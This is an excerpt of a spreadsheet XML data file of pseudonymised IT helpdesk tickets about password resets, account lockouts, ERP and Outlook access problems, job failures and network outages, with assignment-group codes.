    <s v="_x000d__x000a__x000d__x000a_received from: wdpzfqgi.zndgqcux@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_can you please help me to put new password to my account?_x000d__x000a__x000d__x000a_yesterday i have changed my password, which worked some 2 hors or so._x000d__x000a_then since that it does not work._x000d__x000a__x000d__x000a_my suspision is that the new password was the same like in the past (1 year ago or so)._x000d__x000a__x000d__x000a_i want to log into password_management_tool password manager but without any success._x000d__x000a__x000d__x000a_[cid:image005.jpg@01d22f4f.c9f93500]_x000d__x000a__x000d__x000a_[cid:image006.jpg@01d22f4f.c9f93500]_x000d__x000a__x000d__x000a_s pofgtzdravem / kind "/>
    <s v="wdpzfqgi zndgqcux"/>
    <x v="0"/>
  </r>
  <r>
    <s v="pls extend mm# 7429784, 7429785 and 7429786 to my user name, thnak you! need to create prs for those mm#."/>
    <s v="pls extend mm# 7429784, 7429785 and 7429786 to my user name, thnak you! need to create prs for those mm#."/>
    <s v="ckitashy dnqojbwi"/>
    <x v="29"/>
  </r>
  <r>
    <s v="setting up my hand set for emails"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ynsqjehx.kqgrsawl@gmail.com_x000d__x000a__x000d__x000a_hi it experts,_x000d__x000a__x000d__x000a_i'd like to continue receive your support for setting up my hand set for emails._x000d__x000a__x000d__x000a__x000d__x000a_pls find my below reply._x000d__x000a__x000d__x000a_a wifi and data plan from your service provider is required to setup email on your mobile device. will use wifi_x000d__x000a__x000d__x000a_is this device company owned? y/n n_x000d__x000a__x000d__x000a_is this a replacement of your old device? y/n y_x000d__x000a__x000d__x000a_if yes, please ensure company data has been removed from the old device (delete exchange setup from settings&gt; mail, contacts, calendar). ok_x000d__x000a__x000d__x000a_for a personal device, please attach approval form signed by manager to the ticketing_tool ticket. enclsoed_x000d__x000a__x000d__x000a_please ensure the device is company approved for email setup._x000d__x000a__x000d__x000a_if it is not a company approved device please contact the gsc._x000d__x000a__x000d__x000a_for help with exchange setup on a personal device, please contact the device vendor. you may also refer to the faq section for steps._x000d__x000a__x000d__x000a_has the exchange setup been completed on your device? y/n seems y_x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="ynsqjehx kqgrsawl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to erp SID_34"/>
    <s v="unable to login to erp SID_34"/>
    <s v="ovlfxsij bcvdlrie"/>
    <x v="0"/>
  </r>
  <r>
    <s v="close cost center"/>
    <s v="_x000a__x000a_received from: bujiesrg.zopcrshl@gmail.com_x000a__x000a_dear all,_x000a__x000a_can you help to close the cost center of cnn003456 for 5463789? "/>
    <s v="bujiesrg zopcrshl"/>
    <x v="9"/>
  </r>
  <r>
    <s v="unable to login to windows "/>
    <s v="unable to login to windows "/>
    <s v="gpevdzct txconyhd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="credit memo request 7112610434 approva"/>
    <s v="hello,_x000d__x000a__x000d__x000a_i have messages to process documents in my erp workflow, but i find none._x000d__x000a_please advise._x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="nuhfwplj ojcwxser"/>
    <x v="12"/>
  </r>
  <r>
    <s v="engineering_tool upload issue"/>
    <s v="from: ufgkybsh ijswtdve _x000a_sent: tuesday, october 25, 2016 8:29 pm_x000a_to: nwfodmhc exurcwkm_x000a_subject: tgryds fw: engineering_tool upload issue_x000a__x000a_dear sir/mam,_x000a__x000a_please find below the screenshot of engineering_tool issue faced during upload._x000a__x000a_please help me to resolve the same._x000a__x000a__x000a_"/>
    <s v="ufgkybsh ijswtdve"/>
    <x v="25"/>
  </r>
  <r>
    <s v="unable to log in to collaboration_platform "/>
    <s v="unable to log in to collaboration_platform "/>
    <s v="ptaerwvk ibvpucyn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on inplant_872730"/>
    <s v="ticket update on inplant_872730"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to pull up reports on sales and markhtyeting tab"/>
    <s v="unable to pull up reports on sales and markhtyeting tab in ess"/>
    <s v="trmhfxoz bxofhryg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset users password"/>
    <s v="reset users password"/>
    <s v="qcehailo wqynckxg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="query regarding logging in to benefits portal"/>
    <s v="query regarding logging in to benefits portal"/>
    <s v="anzdtxso trisfkwe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="inquiry on erp SID_37  bex analysis"/>
    <s v="inquiry on erp SID_37  bex analysis"/>
    <s v="zolnubvq ehrqifxp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset request"/>
    <s v="password reset request"/>
    <s v="pxbqkfgm qexvrmcn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="interface: fastethernet0/1 on usa-plant-mpls-2811,  is down since 10/25/2016 3:27 pm"/>
    <s v="interface: fastethernet0/1 on usa-plant-mpls-2811,  is down since 10/25/2016 3:27 pm_x000d__x000a_(cc communications 10mbps, circuit id is cccethxakm76356 )"/>
    <s v="spxqmiry zpwgoqju"/>
    <x v="7"/>
  </r>
  <r>
    <s v="password reset "/>
    <s v="password reset "/>
    <s v="pwvtoemq ugnxwfoe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please assist thrys hsdbdtt in logging into reporting_tool from crm. see attached screen shot.  he was unable to access using his windows credentials. "/>
    <s v="please assist thrys hsdbdtt in logging into reporting_tool from crm. see attached screen shot.  he was unable to access using his windows credentials. "/>
    <s v="bitdmacs kumdiywz"/>
    <x v="19"/>
  </r>
  <r>
    <s v="outlook freezing on mobile broadband"/>
    <s v="outlook freezing on mobile broadband"/>
    <s v="rolcgqhx ehndjmlv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="configure calendar on phone sync with outlook"/>
    <s v="configure calendar on phone sync with outlook"/>
    <s v="grtaoivq dwjvfkqe"/>
    <x v="33"/>
  </r>
  <r>
    <s v="outlook freezing issue"/>
    <s v="outlook freezing issue"/>
    <s v="eahkpnbm uptiveok"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to find shortcut on erp"/>
    <s v="unable to find shortcut on erp"/>
    <s v="xmunoklw bnmswalv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="hr_tool not working"/>
    <s v="the hr_tool app on the sso page opens to a beshryu screen when i open the pay and taxes tab and does nothing. i can not view any pay records._x000d__x000a_"/>
    <s v="bdgklrnj phwmkldy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook will not open"/>
    <s v="i am unable to open outlook. i am getting the error message:_x000d__x000a_&quot;a new guard page for the stack cannot be created&quot;_x000d__x000a__x000d__x000a_i have tried restarting the computer._x000d__x000a_i have tried starting outlook in safe mode_x000d__x000a_i have tried using the repair function for outlook._x000d__x000a__x000d__x000a_please advise, "/>
    <s v="dpohqclx wzvihrdy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need access to erp kp06789"/>
    <s v="need access to kp06789 to enter forecast for it cost centers.  i had requested and received this access at the end of august.  access appears to be gone again.  need by 10/31/16. "/>
    <s v="etvendormhd xpslzunb"/>
    <x v="34"/>
  </r>
  <r>
    <s v="password reset for yscgjexz hxlbvjgf"/>
    <s v="password reset for yscgjexz hxlbvjgf"/>
    <s v="yscgjexz hxlbvjgf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="node lhqsv4567465 located at usa is down since 10/25/2016 1:47 pm."/>
    <s v="node lhqsv4567465 located at usa is down since 10/25/2016 1:47 pm._x000a_interface: fc7/20 Â· lhqsv4567465 on sandplant_162 and  sandir02 is down since 10/25/2016 1:47 pm."/>
    <s v="spxqmiry zpwgoqju"/>
    <x v="7"/>
  </r>
  <r>
    <s v="account lock and need to unlock"/>
    <s v="account lock and need to unlock"/>
    <s v="tqjsmwvk arqoytbh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="followup on ticket_no0448851"/>
    <s v="followup on ticket_no0448851"/>
    <s v="eqzibjhw ymebpoih"/>
    <x v="0"/>
  </r>
  <r>
    <s v="hr_tool payroll sign in"/>
    <s v="_x000d__x000a__x000d__x000a_received from: gvcfhwjy.lyxcorqb@gmail.com_x000d__x000a__x000d__x000a_hr_tool etime.  unable to see payroll statements.  try to access and receive screen below.  it will not move out of this view._x000d__x000a__x000d__x000a__x000d__x000a_[cid:image003.jpg@01d22ebc.f17f8040]_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="gvcfhwjy lyxcorqb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vpn password not working"/>
    <s v="_x000d__x000a__x000d__x000a_received from: vewdsifl.zjdmftkv@gmail.com_x000d__x000a__x000d__x000a_pl support to resolve this problem_x000d__x000a__x000d__x000a_"/>
    <s v="vewdsifl zjdmftkv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="not able to enter a project in the lean tracker in collaboration_platform. "/>
    <s v="not able to enter a project in the lean tracker in collaboration_platform.  see attached errors.  "/>
    <s v="khvzugxm yqfrcjwl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="urgent - email delegation."/>
    <s v="hi i had an associate leave on the vsp at the end of september.  i had his outlook in my outlook but now it's gone.  i had received an email that it was now stored on collaboration_platform but i don't see anything when i click on the link.  can i have his email restored through 2016._x000a__x000a_"/>
    <s v="nealxjbc owjduxai"/>
    <x v="19"/>
  </r>
  <r>
    <s v="access to retired employee's collaboration_platform"/>
    <s v="Myhrt sthry retired as plant manager in usa. i have replaced him. i request access to his collaboration_platform to copy relevant documents before it is being deleted as per e-mail below._x000a_----------------------------_x000a_from: mqjdyizg amhywoqg _x000a_sent: saturday, october 22, 2016 9:00 am_x000a_to:  &lt;rozsyfai.zncajubh@gmail.com&gt;_x000a_subject: fw: Myhrt sthry's collaboration_platform for business contents will be preserved for 30 days_x000a__x000a_danieâ€¦you should follow up on this to see if there are any files you may need._x000a__x000a_utejhdyd_x000a__x000a__x000a_vice president and general manager_x000a__x000a_from: no-reply@collaboration_platformonline.com [mailto:no-reply@collaboration_platformonline.com] _x000a_sent: saturday, october 22, 2016 8:56 am_x000a_to: mqjdyizg amhywoqg &lt;mqjdyizg.amhywoqg@gmail.com&gt;_x000a_subject: Myhrt sthry's collaboration_platform for business contents will be preserved for 30 days_x000a__x000a_Myhrt sthry's account has been deleted from the active directory. their collaboration_platform for business will be preserved for 30 days. you're the temporary owner of all documents saved to their collaboration_platform for business. if you would like to save content beyond the 30 day retention period, you can copy important documents to another location. you can also contact your administrator to reassign ownership to another collaboration_platform for business owner. after 30 days, Myhrt sthry's collaboration_platform for business will be permanently deleted. go to Myhrt sthry's collaboration_platform for business at _x000a__x000a__x000a_"/>
    <s v="rozsyfai zncajubh"/>
    <x v="15"/>
  </r>
  <r>
    <s v="cannot open excel files from \\HostName_1351\departments\hrm pricing\current pricing\fy17 and bkzcfmse naslrwdb can."/>
    <s v="cannot open excel files from \\HostName_1351\departments\hrm pricing\current pricing\fy17 and bkzcfmse naslrwdb can. files are slow to open or will freeze."/>
    <s v="hmnuiltc cqpzgvym"/>
    <x v="11"/>
  </r>
  <r>
    <s v="cannot print to prtqx1270 under my profile on rqxw7404175"/>
    <s v="cannot print to prtqx1270 under my profile on rqxw7404175"/>
    <s v="zuangtpq xpnscghk"/>
    <x v="2"/>
  </r>
  <r>
    <s v="cannot print from windows with new pc i was just given."/>
    <s v="cannot print from windows with new pc i was just given."/>
    <s v="bgflmyar xgufkidq"/>
    <x v="2"/>
  </r>
  <r>
    <s v="intermittent wireless issue on 7350"/>
    <s v="intermittent wireless issue on 7350"/>
    <s v="pojhkxua frpxtsca"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset passwords for prgewfly ndtfvple using password_management_tool password reset."/>
    <s v="complete"/>
    <s v="prgewfly ndtfvple"/>
    <x v="16"/>
  </r>
  <r>
    <s v="reset the password for prgewfly ndtfvple on erp / development / erp"/>
    <s v="completed"/>
    <s v="prgewfly ndtfvple"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook is slow."/>
    <s v="outlook is slow."/>
    <s v="axdyfojg nyjlxbsk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="does the vpn meter the amount of data that can be transferred?"/>
    <s v="does the vpn meter the amount of data that can be transferred?"/>
    <s v="xbkucsvz gcpydteq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="recall: incident ticket_no1563995 has been assigned to oncidblt ucewizyd"/>
    <s v="_x000a__x000a_received from: oncidblt.ucewizyd@gmail.com_x000a__x000a_trhsys hrydjs would like to recall the message, &quot;incident ticket_no1563995 has been assigned to oncidblt ucewizyd&quot;._x000a__x000a__x000a_"/>
    <s v="oncidblt ucewizyd"/>
    <x v="8"/>
  </r>
  <r>
    <s v="password reset"/>
    <s v="password reset"/>
    <s v="lrbjqcmh jbiwtzqr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account gets locked out."/>
    <s v="account gets locked out._x000d__x000a_id changed from company to company._x000d__x000a_"/>
    <s v="htsnaodb adjtmlzn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset"/>
    <s v="password reset"/>
    <s v="gpdywmbt pmxfiqkl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked."/>
    <s v="account locked."/>
    <s v="bkyphsgq cfyksehu"/>
    <x v="0"/>
  </r>
  <r>
    <s v=" : query : what license does knlrgsiv cqvuexjz has."/>
    <s v="knlrgsiv cqvuexjz has e1 license._x000d__x000a_"/>
    <s v="aorthyme rnsuipbk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to engineering tool"/>
    <s v="unable to login to engineering tool"/>
    <s v="ipydfcqo kdxsquzn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password change request."/>
    <s v="password change request."/>
    <s v="mofjyqrh bcyzmkia"/>
    <x v="0"/>
  </r>
  <r>
    <s v="uacyltoe hxgayczeing - pl ignore"/>
    <s v="uacyltoe hxgayczeing - pl ignore"/>
    <s v="zscohabw qorvugzf"/>
    <x v="35"/>
  </r>
  <r>
    <s v="reset the password for xoukpfvr oxvakgcl on erp / production / hcm"/>
    <s v="i'm unable to login erp system (engineering tool) SID_34 "/>
    <s v="ipydfcqo kdxsquzn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="misplaced login information for ess"/>
    <s v="misplaced login information for ess"/>
    <s v="ustxqmwi lcpfkrwh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset erp SID_34 password for vvtgryhud"/>
    <s v="reset erp SID_34 password for vvtgryhud"/>
    <s v="izhyoqms wecyhadn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to the hub"/>
    <s v="misplaced username / password."/>
    <s v="diozrjfn qotabyjn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset passwords for xoukpfvr oxvakgcl using password_management_tool password reset."/>
    <s v="as per system instruction now i have reset the password, but i'm unable to login erp system SID_34"/>
    <s v="ipydfcqo kdxsquzn"/>
    <x v="16"/>
  </r>
  <r>
    <s v="misplaced username / password"/>
    <s v="unable to login to the hub"/>
    <s v="diozrjfn qotabyjn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset for axhkewnv zpumhlic in citrix "/>
    <s v="password reset for axhkewnv zpumhlic in citrix "/>
    <s v="rhwsmefo tvphyura"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to use jabra head phone for skype calls"/>
    <s v="unable to use jabra head phone for skype calls"/>
    <s v="dqplrwoy cutpwjie"/>
    <x v="0"/>
  </r>
  <r>
    <s v="removing e-mail reminders from workflow systems of requisition approval "/>
    <s v="removing e-mail reminders from workflow systems of requisition approval.  i get repeated e-mail reminders for purchase approval from workflow tasks, but they have been completed long ago.  "/>
    <s v="czwgmjhn rdnyckft"/>
    <x v="29"/>
  </r>
  <r>
    <s v="collaboration_platform deleted information"/>
    <s v="hello,_x000a_the user &quot;tgrsyduf&quot; accidentally deleted information from collaboration_platform yesterday. is possible recover this information?_x000a_"/>
    <s v="bxeagsmt zrwdgsco"/>
    <x v="15"/>
  </r>
  <r>
    <s v="collaboration_platform site request"/>
    <s v="hello_x000a__x000a_can you add the users below to as team members to the cybersecurity website _x000a__x000a_i should have ownership; users below can have edit access._x000a__x000a_qasouhlc xkhsirtd_x000a_gzhapcld fdigznbk_x000a_ugyothfz ugrmkdhx_x000a_raosetuv hmgwrkzb_x000a_mfyivqes cpihaxbs_x000a_thrdyd dhdtwdd_x000a_thrdyakdj yhtdush_x000a_jqeczxtn gfjcronyudhakar_x000a_akisjtzm uvbmysgcbenezer_x000a_qfrntose ivnhumzjalakrisyuhnyrtn_x000a_thtudb ghtysui_x000a_"/>
    <s v="afkstcev utbnkyop"/>
    <x v="15"/>
  </r>
  <r>
    <s v="reset the password for dnlhsgyo newducsl on erp / production / erp"/>
    <s v="after setting a new overall password i couldn't access erp. too many fails.sorry for that."/>
    <s v="dnlhsgyo newducsl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="workplanning from germany plant plant_119 need in bbo1345 the  same erp possibilites "/>
    <s v="hello all_x000a_my collegue &quot;thryduf&quot; and i &quot;hddwtra&quot; need for the future fully erp acceptance for plant plant_27 too_x000a_"/>
    <s v="hsbfiako iylbrwpa"/>
    <x v="19"/>
  </r>
  <r>
    <s v="probleme mit portal \knlrgsiv cqvuexjz"/>
    <s v="probleme mit portal \knlrgsiv cqvuexjz"/>
    <s v="knlrgsiv cqvuexjz"/>
    <x v="24"/>
  </r>
  <r>
    <s v="unable to login to erp pp5t463"/>
    <s v="password reset needed"/>
    <s v="qcehailo wqynckxg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to pc"/>
    <s v="misplaced username / password."/>
    <s v="serckxqb mljnkgze"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to join and setup skype meeting "/>
    <s v="unable to join and setup skype meeting "/>
    <s v="spamkgnx nbixueyw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="rma 7112619085 workflow in error status"/>
    <s v="rma 7112619085 workflow in error status - please advise reason for error and restart workflow. "/>
    <s v="lwgytuxq qspdztiw"/>
    <x v="12"/>
  </r>
  <r>
    <s v="setup rechner ewel8323865 fÃ¼r hr.thrydad (thrydad consulting ) \puxsvfwr cwkjruni"/>
    <s v="setup rechner ewel8323865 fÃ¼r hr.thrydad (thrydad consulting ) \puxsvfwr cwkjruni"/>
    <s v="puxsvfwr cwkjruni"/>
    <x v="24"/>
  </r>
  <r>
    <s v="employee accounts reactivation etdh thsydaas's "/>
    <s v="etdh thsydaas's 's (employee # 660067598) computer access is terminated. please usa him access back aerp. his last day with company is oct 31."/>
    <s v="xidbvzsk yrlsnxio"/>
    <x v="19"/>
  </r>
  <r>
    <s v="recurrent network outage. (every 15 minutes) in penn"/>
    <s v="recurrent network outage. (every 15 minutes)._x000a_intranet and internet both are affected._x000a_contact :"/>
    <s v="zcdirjeq azokfsdi"/>
    <x v="3"/>
  </r>
  <r>
    <s v="engineering tool shows message to all users of south_amerirtca after the logon"/>
    <s v="since monday 10/24/2016, engineering tool users of south_amerirtca reported that engineering tool shows a message after the logon related to the server HostName_1238 (plm server)._x000d__x000a_please see attached message."/>
    <s v="kbnfxpsy gehxzayq"/>
    <x v="13"/>
  </r>
  <r>
    <s v="bitte konto ewel8323865 reaktivieren \laptop fÃ¼r ein hr prÃ¼fer \konto fÃ¼r trhfyd sugajadd ist aktiv .bitte um rÃ¼ckruf ."/>
    <s v="bitte konto ewel8323865 reaktivieren \laptop fÃ¼r ein hr prÃ¼fer \konto fÃ¼r trhfyd sugajadd ist aktiv .bitte um rÃ¼ckruf ._x000a_fyi_x000a__x000a_von: mfyivqes cpihaxbs _x000a_gesendet: dienstag, 25. oktober 2016 12:54_x000a_an: ughzilfm cfibdamq_x000a_betreff: re: bitte konto ewel8323865 reaktivieren \laptop fÃ¼r ein hr prÃ¼fer \konto fÃ¼rtrhfyd sugajadd ist aktiv .bitte um rÃ¼ckruf ._x000a__x000a_hallo ,_x000a__x000a_bitte ein tickert an help aufmachen, die kÃ¶nnen das machen_x000a__x000a_grÃ¼ÃŸe_x000a__x000a__x000a_"/>
    <s v="ughzilfm cfibdamq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="sales manager views in business objects explorer"/>
    <s v="the following sales managers cannot see the sales manager views in business objects explorer_x000a_- tcflirwg ojflyruq_x000a_- bmudkpie qolrvbip_x000a_- thryd athrdyau_x000a_- vksfrhdx njhaqket_x000a_please check their security and settings with respect to bobj"/>
    <s v="wvdxnkhf jirecvta"/>
    <x v="8"/>
  </r>
  <r>
    <s v="reset passwords for qnxfegjw rljdhmwb using password_management_tool password reset."/>
    <s v="reset passwords for qnxfegjw rljdhmwb using password_management_tool password reset."/>
    <s v="qnxfegjw rljdhmwb"/>
    <x v="16"/>
  </r>
  <r>
    <s v="probleme mit erpgui \tmqfjard qzhgdoua"/>
    <s v="probleme mit erpgui \tmqfjard qzhgdoua"/>
    <s v="tmqfjard qzhgdoua"/>
    <x v="24"/>
  </r>
  <r>
    <s v="support fÃ¼r fa.thrydsss-funke \laeusvjo fvaihgpx"/>
    <s v="support fÃ¼r fa.thrydsss-funke \laeusvjo fvaihgpx"/>
    <s v="laeusvjo fvaihgpx"/>
    <x v="24"/>
  </r>
  <r>
    <s v="bildband  tauschen \drucker we68678 \vepxdgot poezmwny"/>
    <s v="bildband  tauschen \drucker we68678 \vepxdgot poezmwny"/>
    <s v="vepxdgot poezmwny"/>
    <x v="24"/>
  </r>
  <r>
    <s v="primary telephone flow down - company EU  - EU plant"/>
    <s v="hello,  writes from company EU plant_x000a__x000a_this mail for inform that we have primary telephone flow down  _x000a__x000a_all incomig calls and external calls are not running._x000a__x000a_i opened a tck to telecom for investigate and for solving the problem._x000a__x000a_tck no . #03437236504 _x000a__x000a_"/>
    <s v="cgxhmrvu dbwspjet"/>
    <x v="36"/>
  </r>
  <r>
    <s v="bobj access not working"/>
    <s v="_x000a__x000a_received from: btvmxdfc.yfahetsc@gmail.com_x000a__x000a_hello,_x000a_i can now enter bobj but not able to look into any spaces: see below screenshot error when entering any space:_x000a_[cid:image001.jpg@01d22eab.12342be0]_x000a_[cid:image002.jpg@01d22eab.12342be0]_x000a__x000a__x000a__x000a_sales manager company western europe_x000a_btvmxdfc.yfahetsc@gmail.com&lt;mailto:btvmxdfc.yfahetsc@gmail.com&gt;_x000a_"/>
    <s v="btvmxdfc yfahetsc"/>
    <x v="8"/>
  </r>
  <r>
    <s v="bobj access for sales managers"/>
    <s v="_x000a__x000a_received from: yzugpdco.nsyapewg@gmail.com_x000a__x000a_team,_x000a_my sales managers are not seeing their team view in bobj anymore (global access)._x000a_they need it to pull data analysis._x000a_can you please reinstall global access for:_x000a__x000a_-          tcflirwg ojflyruq_x000a__x000a_-          bmudkpie qolrvbip_x000a__x000a_-          thryd adwjfpbreu_x000a__x000a_-          vksfrhdx njhaqket_x000a_"/>
    <s v="yzugpdco nsyapewg"/>
    <x v="8"/>
  </r>
  <r>
    <s v="skpe addon gone"/>
    <s v="skpe addon gone_x000a_____________________________x000a__x000a_ic_x000a_ welcome, our next available agent will be with you shortly..._x000a_ interaction alerting agent._x000a_ website visitor has joined the conversation_x000a_maaryuyten_x000a_ hello , need your help. my  skype botton in outlook is gone_x000a_ hello , need your help. my  skype botton in outlook is gone_x000a_dwfiykeo argtxmvcumar3_x000a_ hello, "/>
    <s v="jvxtfhkg heptuizn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_593 failed in job_scheduler at: 10/25/2016 05:07:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_593 failed in job_scheduler at: 10/25/2016 05:07:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="hpqc delivers error message: &quot;user is not maintained in the project fy_13 release. please contact hpqc admin&quot;"/>
    <s v="my user id: thrydksd'_x000a_iÂ´m involved in uat uacyltoe hxgayczeing for ec-ecc and was asked to re-install hpqc client installation kit, what iÂ´ve already done with below links._x000a__x000a__x000a__x000a_when i start hpqc and enter my windows user name and windows password i receive following error message:&quot;user is not maintained in the project fy_13 release. please contact hpqc admin&quot;_x000a__x000a_"/>
    <s v="iavozegx jpcudyfi"/>
    <x v="37"/>
  </r>
  <r>
    <s v="job Job_495 failed in job_scheduler at: 10/25/2016 04:46:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_495 failed in job_scheduler at: 10/25/2016 04:46:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="telefon gigaset m2 ex professional (tel.:) lÃ¤d nicht mehr. anschluss defekt."/>
    <s v="telefon gigaset m2 ex professional (tel.:) lÃ¤d nicht mehr. anschluss defekt."/>
    <s v="txkgmwbc qohmgwrp"/>
    <x v="32"/>
  </r>
  <r>
    <s v="please setup user trhdaa2 back to startpassword at erp"/>
    <s v="please setup user trhdaa2 back to startpassword at erp"/>
    <s v="pwotudlf wpjlxfke"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp - change of new costs not working in cockpit - field mvgr4"/>
    <s v="hello, following problem:_x000d__x000a_due to necessary changes on tool for an received order i tried to update the costs in cockpit, but when saving the quote, it does not work: error message' field mvgr4 cannot be changed, vbapkom 00010 ready for input' any hints how to solve that? i did that on other q1's before and it worked, only new thing is that we have an order running._x000d__x000a_erp data, in case it is necessary: order # 36156763  - q1 # 3116244801. concerning items: 10 (as above), 260, 380, 400"/>
    <s v="nobwzdvh yqjugexl"/>
    <x v="12"/>
  </r>
  <r>
    <s v="nutzer wk_ksem15462 gesperrt"/>
    <s v="nutzer wk_ksem15462 gesperrt"/>
    <s v="jcgzqndm hukibzqa"/>
    <x v="32"/>
  </r>
  <r>
    <s v="timerecording terminals in plant germany no communication to the server in fÃ¼rth(bcom server in fÃ¼rth)"/>
    <s v="timerecording terminals in plant germany no communication to the server in fÃ¼rth. they are sending the message &quot;"/>
    <s v="smpijawb eawkpgqf"/>
    <x v="32"/>
  </r>
  <r>
    <s v="job Job_485 failed in job_scheduler at: 10/25/2016 02:33:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_485 failed in job_scheduler at: 10/25/2016 02:33:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="ieæµè§ˆå™¨æ‰“å¼€crmç³»ç»ŸåŽæç¤ºç”¨æˆ·å·²è¢«æ³¨é”€ï¼Œæ— æ³•ç™»å½•crmç³»ç»Ÿã€‚"/>
    <s v="ieæµè§ˆå™¨æ‰“å¼€crmç³»ç»ŸåŽæç¤ºç”¨æˆ·å·²è¢«æ³¨é”€ï¼Œæ— æ³•ç™»å½•crmç³»ç»Ÿã€‚"/>
    <s v="cjnlsbkq ocxnrewb"/>
    <x v="31"/>
  </r>
  <r>
    <s v="access to s drive."/>
    <s v="_x000d__x000a__x000d__x000a_received from: wnvlmsjr.znbvlygd@gmail.com_x000d__x000a__x000d__x000a_hello ,_x000d__x000a__x000d__x000a_kindly request to give access to s drive._x000d__x000a__x000d__x000a_s:\globalengservices\_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="wnvlmsjr znbvlygd"/>
    <x v="11"/>
  </r>
  <r>
    <s v="kindly add user id : trhsydsff to erp business analytics team in ticketing_tool tool"/>
    <s v="kindly add user id : trhsydsff to erp business analytics team in ticketing_tool tool"/>
    <s v="vthuzanc fqdgotvx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1854 failed in job_scheduler at: 10/25/2016 01:36:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1854 failed in job_scheduler at: 10/25/2016 01:36:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="desktop item missing when save attachment ."/>
    <s v="desktop item missing when save attachment ."/>
    <s v="zmkitbsh bxsyaipz"/>
    <x v="31"/>
  </r>
  <r>
    <s v="HostName_1030 is currently experiencing high cpu utilization. please investigate!"/>
    <s v="HostName_1030 is currently experiencing high cpu utilization. please investigate!"/>
    <s v="bozdftwx smylqejw"/>
    <x v="11"/>
  </r>
  <r>
    <s v="mass - upload programdnty changes to condition table a520 in crm"/>
    <s v="mass - upload programdnty changes to condition table a520 in crm_x000d__x000a_"/>
    <s v="xawlkiey demjqrfl"/>
    <x v="14"/>
  </r>
  <r>
    <s v=" server lnbdm839 (active directory) located in   philadelphâ€‹ia is down since 12:25 am et on 10/25."/>
    <s v=" server lnbdm839 (active directory) located in   philadelphâ€‹ia is down since 12:25 am et on 10/25."/>
    <s v="bozdftwx smylqejw"/>
    <x v="38"/>
  </r>
  <r>
    <s v="xtsuifdz.wktgzcyl@gmail.com is blocked now as the user said"/>
    <s v="xtsuifdz.wktgzcyl@gmail.com is blocked now as the user said"/>
    <s v="dbwkxalj cnhgysju"/>
    <x v="0"/>
  </r>
  <r>
    <s v="access to //HostName_95/departments/backorderreports"/>
    <s v="_x000a__x000a_received from: avurmegj.pxgmjynu@gmail.com_x000a__x000a_please give full access to user trhadg45 for folder mentioned in the subject._x000a__x000a_"/>
    <s v="avurmegj pxgmjynu"/>
    <x v="11"/>
  </r>
  <r>
    <s v="the user's account is blocked now (xtsuifdz.wktgzcyl@gmail.com)"/>
    <s v="name:dbwkxalj cnhgysju_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:dbwkxalj.cnhgysju@gmail.com_x000a_customer number:_x000a__x000a_summary:the user's account is blocked now (xtsuifdz.wktgzcyl@gmail.com)"/>
    <s v="dbwkxalj cnhgysju"/>
    <x v="0"/>
  </r>
  <r>
